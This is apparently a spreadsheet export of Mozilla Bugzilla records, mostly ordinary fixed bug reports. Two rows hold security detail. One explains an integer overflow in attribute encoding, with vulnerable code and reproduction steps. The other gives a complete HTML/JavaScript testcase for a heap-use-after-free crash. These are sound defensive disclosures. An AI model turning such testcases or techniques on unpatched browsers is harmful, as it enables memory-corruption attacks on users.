          <t>2012-12-18 20:46:26 -0800</t>
        </is>
      </c>
      <c r="E5095" t="n">
        <v>1</v>
      </c>
      <c r="F5095" t="n">
        <v>1</v>
      </c>
      <c r="G5095" t="n">
        <v>4</v>
      </c>
      <c r="H5095" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5095" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5095" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5095" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L5095" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5095" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5095" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5095" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5095" t="inlineStr"/>
      <c r="Q5095" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5095" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5095" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5095" t="n">
        <v>1</v>
      </c>
      <c r="U5095" t="n">
        <v>0</v>
      </c>
      <c r="V5095" t="n">
        <v>26</v>
      </c>
      <c r="W5095" t="inlineStr">
        <is>
          <t>Apparently if the user shuts down their window Bugzilla scripts automatically
die.  This is not acceptable.  Increasingly problems are being pinned on this
issue.
Apparently this only happens when you do a print - hopefully that's true.  In
this case templatisation would help greatly.  However, we'd lose incremental
output for process_bug.cgi, which would be useful, so I would prefer to be able
to use template fragments there and use another technique where necessary.
Gerv fingered this for part of bug #99788, but I'm not sure that's correct
because it supposedly requires prints in between.
Dave has seen before that when you quit a bulk change it stops part way
through.  That was good in the particular circumstance, but I'd say it isn't in
general.
I have _confirmed_ that this is at least one (and maybe the only) circumstance
where emails fail to get sent out.  This can happen when you change dependencies
and the emails for the other side doesn't get sent out.
So what to do?  For some things this behaviour is desirable (sanity check, where
incremental is good as well), and with some things templates are enough (where
incremental output is not needed), but it would be nice to have a middle ground
where this doesn't occur and we can have incremental output (for
process_bug.cgi).</t>
        </is>
      </c>
      <c r="X5095" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5096">
      <c r="A5096" t="n">
        <v>1111834</v>
      </c>
      <c r="B5096" t="inlineStr">
        <is>
          <t>2014-12-15 14:50:43 -0800</t>
        </is>
      </c>
      <c r="C5096" t="inlineStr">
        <is>
          <t>CORS request after preflight should not follow 30x redirect</t>
        </is>
      </c>
      <c r="D5096" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:56 -0700</t>
        </is>
      </c>
      <c r="E5096" t="n">
        <v>1</v>
      </c>
      <c r="F5096" t="n">
        <v>1</v>
      </c>
      <c r="G5096" t="n">
        <v>3</v>
      </c>
      <c r="H5096" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5096" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5096" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K5096" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5096" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5096" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5096" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5096" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5096" t="inlineStr">
        <is>
          <t>[adv-main37+][adv-esr31.6+]</t>
        </is>
      </c>
      <c r="Q5096" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5096" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5096" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T5096" t="n">
        <v>1</v>
      </c>
      <c r="U5096" t="n">
        <v>0</v>
      </c>
      <c r="V5096" t="n">
        <v>28</v>
      </c>
      <c r="W5096" t="inlineStr">
        <is>
          <t>Follow up on Bug 1080987. As explained in [1], a CORS reqeust after preflight shouldn't follow 30x redirect, see spec [2].
[1] https://bugzilla.mozilla.org/show_bug.cgi?id=1080987#c3
[2] http://www.w3.org/TR/cors/#cross-origin-request-with-preflight-0</t>
        </is>
      </c>
      <c r="X5096" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5097">
      <c r="A5097" t="n">
        <v>268107</v>
      </c>
      <c r="B5097" t="inlineStr">
        <is>
          <t>2004-11-06 07:51:21 -0800</t>
        </is>
      </c>
      <c r="C5097" t="inlineStr">
        <is>
          <t>mailnews allows cookies, despite the pref</t>
        </is>
      </c>
      <c r="D5097" t="inlineStr">
        <is>
          <t>2005-04-06 19:58:49 -0700</t>
        </is>
      </c>
      <c r="E5097" t="n">
        <v>1</v>
      </c>
      <c r="F5097" t="n">
        <v>1</v>
      </c>
      <c r="G5097" t="n">
        <v>3</v>
      </c>
      <c r="H5097" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5097" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5097" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K5097" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5097" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5097" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5097" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5097" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5097" t="inlineStr"/>
      <c r="Q5097" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5097" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5097" t="inlineStr">
        <is>
          <t>mozilla1.8beta1</t>
        </is>
      </c>
      <c r="T5097" t="n">
        <v>1</v>
      </c>
      <c r="U5097" t="n">
        <v>0</v>
      </c>
      <c r="V5097" t="n">
        <v>20</v>
      </c>
      <c r="W5097" t="inlineStr">
        <is>
          <t>Even if you have the pref (network.cookie.disableCookieForMailNews) set,
mailnews still allows cookies.
This is because MOZ_MAIL_NEWS is not defined in cpp files. And the code to check
if cookies are from mailnews is inside #ifdef MOZ_MAIL_NEWS blocks. So the
blocks are not compiled. (checked by adding garbage in the blocks, and gcc
didn't complain about it. And i do have mailnews enabled)
A solution would be to do like
http://lxr.mozilla.org/seamonkey/source/calendar/libxpical/Makefile.in#86 but
that looks like a hack.
Filing in cookies, because that is where the code lives.</t>
        </is>
      </c>
      <c r="X5097" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5098">
      <c r="A5098" t="n">
        <v>91087</v>
      </c>
      <c r="B5098" t="inlineStr">
        <is>
          <t>2001-07-17 05:49:10 -0700</t>
        </is>
      </c>
      <c r="C5098" t="inlineStr">
        <is>
          <t>No longer able to login to banking site (secure)</t>
        </is>
      </c>
      <c r="D5098" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E5098" t="n">
        <v>1</v>
      </c>
      <c r="F5098" t="n">
        <v>1</v>
      </c>
      <c r="G5098" t="n">
        <v>6</v>
      </c>
      <c r="H5098" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5098" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5098" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K5098" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L5098" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5098" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5098" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5098" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5098" t="inlineStr">
        <is>
          <t>[ckritzer]</t>
        </is>
      </c>
      <c r="Q5098" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5098" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5098" t="inlineStr">
        <is>
          <t>psm2.1</t>
        </is>
      </c>
      <c r="T5098" t="n">
        <v>1</v>
      </c>
      <c r="U5098" t="n">
        <v>1</v>
      </c>
      <c r="V5098" t="n">
        <v>10</v>
      </c>
      <c r="W5098" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/4.61 [en] (OS/2; U)
BuildID:    2001062912
Previous versions (0.9.1, .8, .6) permitted login to the banking site. This 
site uses Java or Javascript or both. Using 0.9.2, I am redireced to a page 
which states:
   System Message
   You cannot bookmark or directly access this page.
This had not happened previously. I was able to login before and at least view 
bank balances (even if I could not access all the banking functions correctly 
such as transfer of funds). Other secure banking sites are fine.
Reproducible: Always
Steps to Reproduce:
1.go to site www.hsbc.com.hk/script/hk/home.asp
2.enter junk id and password
3.before (i.e., 0.9.1) it would say invalid password (now it says you cannot 
bookmark the page).
Actual Results:     System Message
                    You cannot bookmark or directly access this page.
Expected Results:   either login properly or message complaining about invalid 
password
I ran this under OS/2. I am told this problem also arises under the Windows 
build. Previous builds (0.9.1, 0.8, 0.6) did not have this problem as far as I 
am aware.
NB: I am uncertain which component is involved and I have guessed the client 
library (rather than Daemon).</t>
        </is>
      </c>
      <c r="X5098" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5099">
      <c r="A5099" t="n">
        <v>1062981</v>
      </c>
      <c r="B5099" t="inlineStr">
        <is>
          <t>2014-09-04 10:18:06 -0700</t>
        </is>
      </c>
      <c r="C5099" t="inlineStr">
        <is>
          <t>Navigating away from a page with camera sharing in an iframe leaves camera recording</t>
        </is>
      </c>
      <c r="D5099" t="inlineStr">
        <is>
          <t>2015-07-06 11:57:20 -0700</t>
        </is>
      </c>
      <c r="E5099" t="n">
        <v>1</v>
      </c>
      <c r="F5099" t="n">
        <v>1</v>
      </c>
      <c r="G5099" t="n">
        <v>3</v>
      </c>
      <c r="H5099" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5099" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5099" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K5099" t="inlineStr">
        <is>
          <t>32 Branch</t>
        </is>
      </c>
      <c r="L5099" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5099" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5099" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5099" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5099" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q5099" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5099" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5099" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T5099" t="n">
        <v>1</v>
      </c>
      <c r="U5099" t="n">
        <v>0</v>
      </c>
      <c r="V5099" t="n">
        <v>27</v>
      </c>
      <c r="W5099" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of another bug +++
STR:
1. Go to http://mozilla.github.com/webrtc-landing/gum_iframe.html
2. Click video to enable camera sharing in one of the iframes.
3. Navigate away (type in any URL) and observe that the camera light stays on.
4. Hit the back button, and there you are, still being recorded it seems, visuals and all.
The same problem exists if you navigate away using the Back button in step 3.
This problem seems specific to camera sharing in iframes. I've verified that MediaManager::OnNavigation is not called in these cases.</t>
        </is>
      </c>
      <c r="X5099" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5100">
      <c r="A5100" t="n">
        <v>1173284</v>
      </c>
      <c r="B5100" t="inlineStr">
        <is>
          <t>2015-06-10 01:50:05 -0700</t>
        </is>
      </c>
      <c r="C5100" t="inlineStr">
        <is>
          <t>Firefox OS Lockscreen passcode bypass due to race condition</t>
        </is>
      </c>
      <c r="D5100" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:17 -0700</t>
        </is>
      </c>
      <c r="E5100" t="n">
        <v>1</v>
      </c>
      <c r="F5100" t="n">
        <v>1</v>
      </c>
      <c r="G5100" t="n">
        <v>6</v>
      </c>
      <c r="H5100" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5100" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5100" t="inlineStr">
        <is>
          <t>Gaia::System::Lockscreen</t>
        </is>
      </c>
      <c r="K5100" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5100" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5100" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5100" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5100" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5100" t="inlineStr">
        <is>
          <t>[v3.0-nexus-5-l][b2g-adv-main2.5+]</t>
        </is>
      </c>
      <c r="Q5100" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5100" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5100" t="inlineStr">
        <is>
          <t>FxOS-S4 (07Aug)</t>
        </is>
      </c>
      <c r="T5100" t="n">
        <v>1</v>
      </c>
      <c r="U5100" t="n">
        <v>0</v>
      </c>
      <c r="V5100" t="n">
        <v>109</v>
      </c>
      <c r="W5100" t="inlineStr">
        <is>
          <t>[1.Description]:
[Flame v3.0][Nexus 5 v3.0][Lock Screen]Enable the passcode, restart device, slide to left for unlocking screen, but sometimes it will not prompt user to input the passcode and directly enter homescreen.
Found time: 20:47
Attach: passcode.mp4 and logcat_2047.txt
[2.Testing Steps]: 
1. Enable passcode lock in Settings/Screen Lock.
2. Restart device.
3. Try to unlock screen.
[3.Expected Result]: 
3. It should prompt user to input passcode for unlocking sceen.
[4.Actual Result]: 
3. It will not prompt user to input passcode.
[5.Reproduction build]: 
Device: Flame v2.2 build(unaffected)
Build ID               20150609162508
Gaia Revision          06edb0f8db7c2f45cde54401a8593663059861a4
Gaia Date              2015-06-08 14:29:09
Gecko Revision         https://hg.mozilla.org/releases/mozilla-b2g37_v2_2/rev/a3d7b08fb0ec
Gecko Version          37.0
Device Name            flame
Firmware(Release)      4.4.2
Firmware(Incremental)  eng.cltbld.20150609.211329
Firmware Date          Tue Jun  9 21:13:39 EDT 2015
Bootloader             L1TC000118D0
Device: Nexus 5 v2.2 build(unaffected)
Build ID               20150609081832
Gaia Revision          06edb0f8db7c2f45cde54401a8593663059861a4
Gaia Date              2015-06-08 14:29:09
Gecko Revision         https://hg.mozilla.org/releases/mozilla-b2g37_v2_2/rev/239c59921129
Gecko Version          37.0
Device Name            hammerhead
Firmware(Release)      5.1
Firmware(Incremental)  eng.cltbld.20150609.121628
Firmware Date          Tue Jun  9 12:16:44 EDT 2015
Bootloader             HHZ12f
Device: Flame v3.0 build(affected)
Build ID               20150609160220
Gaia Revision          31ef8deec7a04a988eb92309178b87cc0bde8220
Gaia Date              2015-06-08 14:48:40
Gecko Revision         https://hg.mozilla.org/mozilla-central/rev/8be8deb10e4f
Gecko Version          41.0a1
Device Name            flame
Firmware(Release)      4.4.2
Firmware(Incremental)  eng.cltbld.20150609.193617
Firmware Date          Tue Jun  9 19:36:29 EDT 2015
Bootloader             L1TC000118D0
Device: Nexus 5 v3.0 build(affected)
Build ID               20150609081840
Gaia Revision          ea27c4ed5b6083c9e21d233d4804372ac4d5d353
Gaia Date              2015-06-08 03:06:41
Gecko Revision         https://hg.mozilla.org/mozilla-central/rev/e10e2e8d8bf2
Gecko Version          41.0a1
Device Name            hammerhead
Firmware(Release)      5.1
Firmware(Incremental)  eng.cltbld.20150609.121002
Firmware Date          Tue Jun  9 12:10:19 EDT 2015
Bootloader             HHZ11k
[6.Reproduction Frequency]: 
occasionally Recurrence,6/20
[7.TCID]: 
Free Test</t>
        </is>
      </c>
      <c r="X5100" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5101">
      <c r="A5101" t="n">
        <v>1186657</v>
      </c>
      <c r="B5101" t="inlineStr">
        <is>
          <t>2015-07-22 14:59:37 -0700</t>
        </is>
      </c>
      <c r="C5101" t="inlineStr">
        <is>
          <t>Crash (UAF) in VideoCaptureImpl::SetCaptureRotation</t>
        </is>
      </c>
      <c r="D5101" t="inlineStr">
        <is>
          <t>2016-07-02 10:53:24 -0700</t>
        </is>
      </c>
      <c r="E5101" t="n">
        <v>1</v>
      </c>
      <c r="F5101" t="n">
        <v>1</v>
      </c>
      <c r="G5101" t="n">
        <v>3</v>
      </c>
      <c r="H5101" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5101" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5101" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K5101" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5101" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5101" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5101" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5101" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5101" t="inlineStr">
        <is>
          <t>[adv-main41+]</t>
        </is>
      </c>
      <c r="Q5101" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5101" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5101" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T5101" t="n">
        <v>1</v>
      </c>
      <c r="U5101" t="n">
        <v>0</v>
      </c>
      <c r="V5101" t="n">
        <v>23</v>
      </c>
      <c r="W5101" t="inlineStr">
        <is>
          <t>Crashes seen in crashstats in webrtc::videocapturemodule::VideoCaptureImpl::SetCaptureRotation(webrtc::VideoCaptureRotation)
with fairly apparent UAF addresses</t>
        </is>
      </c>
      <c r="X5101" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5102">
      <c r="A5102" t="n">
        <v>1880692</v>
      </c>
      <c r="B5102" t="inlineStr">
        <is>
          <t>2024-02-16 15:08:33 -0800</t>
        </is>
      </c>
      <c r="C5102" t="inlineStr">
        <is>
          <t>Write beyond bounds caused by AppendEncodedAttributeValue() et al</t>
        </is>
      </c>
      <c r="D5102" t="inlineStr">
        <is>
          <t>2024-09-16 00:26:45 -0700</t>
        </is>
      </c>
      <c r="E5102" t="n">
        <v>1</v>
      </c>
      <c r="F5102" t="n">
        <v>1</v>
      </c>
      <c r="G5102" t="n">
        <v>3</v>
      </c>
      <c r="H5102" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5102" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5102" t="inlineStr">
        <is>
          <t>DOM: Serializers</t>
        </is>
      </c>
      <c r="K5102" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5102" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5102" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5102" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5102" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5102" t="inlineStr">
        <is>
          <t>[adv-main124+][adv-esr115.9+]</t>
        </is>
      </c>
      <c r="Q5102" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5102" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5102" t="inlineStr">
        <is>
          <t>125 Branch</t>
        </is>
      </c>
      <c r="T5102" t="n">
        <v>1</v>
      </c>
      <c r="U5102" t="n">
        <v>0</v>
      </c>
      <c r="V5102" t="n">
        <v>34</v>
      </c>
      <c r="W5102" t="inlineStr">
        <is>
          <t>Created attachment 9380661
ffbug_2260.zip
`AppendEncodedAttributeValue()`, `ExtraSpaceNeededForAttrEncoding()` and `AppendEncodedCharacters()` (`dom/base/nsContentUtils.cpp`) can experience integer overflows, causing underallocation of an output buffer and subsequent writes beyond bounds when `StringBuilder::ToString()` is called to obtain the resulting string. The write occurs in a content process, and is of arbitrary attacker-provided data arbitrarily intermixed with the repeated string `&amp;quot;` or one of a few other escaped sequences. The length of the attacker-provided data and the length of the repeated strings must sum to &gt;= `0x100000000`.
Attached is a POC that demonstrates the bugs in the context of `AppendEncodedAttributeValue()`.
The bugs are that the problem functions add `uint32_t` values -- in particular, lengths derived from strings that can be very long -- without checking for overflow. Lines 9360, 9370, and 9320, plus every instance of `extraSpaceNeeded += &lt;something&gt;` in `ExtraSpaceNeededForAttrEncoding()` and `AppendEncodedCharacters()` are vulnerable. (The following code is from `FIREFOX_122_0_RELEASE`):
```
    9326: static uint32_t ExtraSpaceNeededForAttrEncoding(const nsAString&amp; aValue) {
    9327:   const char16_t* c = aValue.BeginReading();
    9328:   const char16_t* end = aValue.EndReading();
    9329: 
    9330:   uint32_t extraSpaceNeeded = 0;
    9331:   while (c &lt; end) {
    9332:     switch (*c) {
    9333:       case '"':
    9334:         extraSpaceNeeded += ArrayLength("&amp;quot;") - 2;
    9335:         break;
    ... (similar for other escaped chars)
    9344:     }
    9345:     ++c;
    9346:   }
    9347: 
    9348:   return extraSpaceNeeded;
    9349: }
    9351: static void AppendEncodedAttributeValue(const nsAttrValue&amp; aValue,
    9352:                                         StringBuilder&amp; aBuilder) {
    9353:   if (nsAtom* atom = aValue.GetStoredAtom()) {
    9354:     nsDependentAtomString atomStr(atom);
    9355:     uint32_t space = ExtraSpaceNeededForAttrEncoding(atomStr);
    9356:     if (!space) {
    ...
    9358:     } else {
    9359:       aBuilder.AppendWithAttrEncode(nsString(atomStr),
    9360:                                     atomStr.Length() + space);
    9361:     }
    9362:     return;
    9363:   }
    ...
    9366:   nsString str;
    9367:   aValue.ToString(str);
    9368:   uint32_t space = ExtraSpaceNeededForAttrEncoding(str);
    9369:   if (space) {
    9370:     aBuilder.AppendWithAttrEncode(std::move(str), str.Length() + space);
    9371:   } else {
    ...
    9373:   }
    9374: }
    9271: static void AppendEncodedCharacters(const nsTextFragment* aText,
    9272:                                     StringBuilder&amp; aBuilder) {
    9273:   uint32_t extraSpaceNeeded = 0;
    9274:   uint32_t len = aText-&gt;GetLength();
    9275:   if (aText-&gt;Is2b()) {
    9276:     const char16_t* data = aText-&gt;Get2b();
    9277:     for (uint32_t i = 0; i &lt; len; ++i) {
    9278:       const char16_t c = data[i];
    9279:       switch (c) {
    ...
    9289:         case 0x00A0:
    9290:           extraSpaceNeeded += ArrayLength("&amp;nbsp;") - 2;
    9291:           break;
    9292:         default:
    9293:           break;
    9294:       }
    9295:     }
    9296:   } else {
    ... (similar for 1-byte characters)
    9317:   }
    9318: 
    9319:   if (extraSpaceNeeded) {
    9320:     aBuilder.AppendWithEncode(aText, len + extraSpaceNeeded);
    ...
    9323:   }
    9324: }
```
Use the attached POC this way:
1. Unzip `ffbug_2260_11.zip`, yielding `ffbug_2260_11.htm` and `ffbug_2260_11_worker.js` .
2. Put these files on a webserver (I used a local webserver at `127.0.0.1`).
3. Start FF and attach a debugger to it.
4. Set a BP on `AppendEncodedAttributeValue()` line 9369.
5. Load `ffbug_2260_11.htm` in FF.
6. When the BP fires, examine `space` and notice that it's `0xd5552000`.
7. Examine `str.Length()` and notice that it's `0x2aaae040`, which, when added to `space` using 32-bit math, yields the overflowed quantity 0x40.
8. Step into `StringBuilder::AppendWithAttrEncode()` and notice that it adds a `Unit` having this length, also adding the same quantity to `StringBuilder::mLength`, which is the total length of the string that `StringBuilder::ToString` will attempt to allocate later.
9. Set a BP on `StringBuilder::ToString` lines 9125 (output buffer allocation) and 9145 (the `Unit::Type::StringWithEncode` case) and proceed.
10. When the buffer-allocation BP fires, notice that `mLength` is tiny (probably `0x50`); this is because of the overflow that occurred in step 7. (The small additional string length of `0x10` is for the other elements that surround the gigantic string in the POC).
11. Proceed. When the `StringWithEncode` BP fires, step into `EncodeAttrString()` and watch it write the attacker-provided data (and the escaped strings) far beyond the end of the output buffer allocated in step 10 (in my test, the buffer appeared to have `mCapacity` == `0x7b`).
12. Proceed. FF may crash copying the long string contents into the heap, or a different thread may malfunction or crash as it uses the data that `EncodeAttrString()` sprayed over the heap.
The POC uses a worker thread to illustrate what an attacker might do to stir the pot so that the heap-spraying is effective. In limited tests with an unoptimized x64 build without `_DEBUG`, only the `ToString()` thread crashes about 70% of the time, with both the `ToString()` thread and one or more other threads crashing most of the remainder. To see multiple crashes, proceed after the debugger pops up with the first thread's crash. Frequent crash locations are in `arena_t::ArenaRunRegAlloc()` on `mask = aRun-&gt;mRegionsMask[i];` in `WorkletThread::IsOnWorkletThread()` on `return ccjscx &amp;&amp; ccjscx-&gt;GetAsWorkletJSContext();`, and in `GetCurrentThreadWorkerPrivate()` on `WorkerJSContext* workerjscx = ccjscx-&gt;GetAsWorkerJSContext();`</t>
        </is>
      </c>
      <c r="X5102" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5103">
      <c r="A5103" t="n">
        <v>1378147</v>
      </c>
      <c r="B5103" t="inlineStr">
        <is>
          <t>2017-07-04 07:46:26 -0700</t>
        </is>
      </c>
      <c r="C5103" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::dom::ImageDocument::UpdateSizeFromLayout</t>
        </is>
      </c>
      <c r="D5103" t="inlineStr">
        <is>
          <t>2024-05-30 09:35:02 -0700</t>
        </is>
      </c>
      <c r="E5103" t="n">
        <v>1</v>
      </c>
      <c r="F5103" t="n">
        <v>1</v>
      </c>
      <c r="G5103" t="n">
        <v>3</v>
      </c>
      <c r="H5103" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5103" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5103" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5103" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L5103" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5103" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5103" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5103" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5103" t="inlineStr">
        <is>
          <t>Keep hidden while bug 1380423 is [adv-main55+][adv-esr52.3+]</t>
        </is>
      </c>
      <c r="Q5103" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5103" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5103" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T5103" t="n">
        <v>1</v>
      </c>
      <c r="U5103" t="n">
        <v>0</v>
      </c>
      <c r="V5103" t="n">
        <v>18</v>
      </c>
      <c r="W5103" t="inlineStr">
        <is>
          <t>Created attachment 8883312
crash.html (testcase, crashes firefox)
The following testcase crashes the latest ASAN build of Firefox 52.2.1 ESR. The testcase requires a few reloads and reproduces best when opened in multiple tabs.
&lt;script&gt;
function start() {
	o0=document.createElement('iframe');
	o0.src='data:image/gif;base64,R0lGODlhAQABAPAAAAAzEQAAACH5BAQZAAAAIf8LTkVUU0NBUEUyLjADAQAAACwAAAAAAQABAAACAkQBACH5BAQZAAAALAAAAAABAAEAgAAzqgAAAAICRAEAIfkEBBkAAAAsAAAAAAEAAQCAIjMRAAAAAgJEAQAh+QQEGQAAACwAAAAAAQABAIAi/xEAAAACAkQBACH5BAQZAAAALAAAAAABAAEAgP//AAAAAAICRAEAIfkEBBkAAAAsAAAAAAEAAQCA//8RAAAAAgJEAQA7';
	o0.seamless='seamless';
	o0.addEventListener('load',fun0,false);
	document.body.appendChild(o0);
}
function fun0() {
	o8=o0.contentWindow;
	o8.onresize=fun1;
	o0.width='3636px';
	o9=o0.contentDocument;
	tmp=o9.getElementsByTagName('*');
	o10=tmp[1];
	o11=tmp[5];
}
function fun1() {
	o10.appendChild(o0);
	o11['textContent']='';
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
	location.reload();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==14974==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200021e8f0 at pc 0x7fcc5a0b2a5a bp 0x7ffe3f3f1980 sp 0x7ffe3f3f1978
READ of size 4 at 0x61200021e8f0 thread T0
